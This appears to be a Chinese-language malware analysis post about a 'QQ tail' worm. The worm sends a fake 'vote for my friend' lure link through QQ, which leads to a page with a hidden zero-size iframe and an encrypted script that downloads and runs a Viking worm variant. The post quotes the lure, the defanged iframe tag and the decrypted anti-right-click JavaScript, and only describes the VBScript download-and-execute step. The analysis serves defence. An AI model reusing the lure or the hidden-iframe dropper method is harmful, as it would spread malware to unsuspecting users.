一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息:
---------------------------------
麻烦帮我朋友投个票啦!她正在竞选QQ小姐,参选Q-Zone空间上有她近照,点击为她增加人气,先谢谢喽……
hxxp://Q-Zone.****qq.C0M.%62%30%76%2E%63%6E/cgi-bin/Photo=No.****947561
---------------------------------
点击该链接,会打开一个标题为”手机游戏-彩铃-视频-图片-综合性手机服务网站.支持各种手机机型下载,支持移动、联通!”的网页,并弹出“移动_联通,谢谢您的参与! ”的对话框。
网页中包含如下代码:
---------------------------------
<iframe src=hxxp://web***1.%33%39%63%6F%6D%2E%6F%72%67/ms***/mm***.htm width=0 height=0></iframe>
---------------------------------
mm***.htm 的代码为加密过的脚本程序。
脚本程序共有2部分。
第1部分脚本程序 使用的是JavaScript,其功能是阻止用户选择网页内容、屏蔽右键关键菜单等,以及第二部分脚本程序正确运行所需要的数据。
解密后的代码为见 附录1。
第2部分脚本程序 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把某个网站(这里不给出网址了)的MS目录中的文件 HOU1.EXE 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
Kaspersky 将 HOU1.EXE 报为 Worm.Win32.Viking.r。
瑞星 将 HOU1.EXE 报为 Worm.Viking.aa。
关于这个蠕虫的更多信息,可参考:
遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(一)
附录1 第1部分脚本程序解密后的代码:
<script language=javascript> --------------------------------- dH6=2476;if(document.all) { function _dm() { return false };function _mdm() { document.οncοntextmenu=_dm; setTimeout("_mdm()",800) };_mdm(); }document.οncοntextmenu=new Function("return false"); function _ndm(e) { if (document.layers||window.sidebar) { if(e.which!=1) return false; } };if(document.layers) { document.captureEvents(Event.MOUSEDOWN); document.οnmοusedοwn=_ndm; } else { document.οnmοuseup=_ndm; };sA75=187; hX40=4188;function _dws() { window.status = " "; setTimeout("_dws()",100); }; _dws();pN54=3615; oG10=1048;function _dds() { if(document.all) { document.onselectstart=function () { return false }; setTimeout("_dds()",700) } };_dds(); nT70=2191; oW82=7332; fH87=190; rN34=1330; qA94=2473; fY59=6474; wI64=9332;; _licensed_to_="TEAM iPA"; </script> ---------------------------------
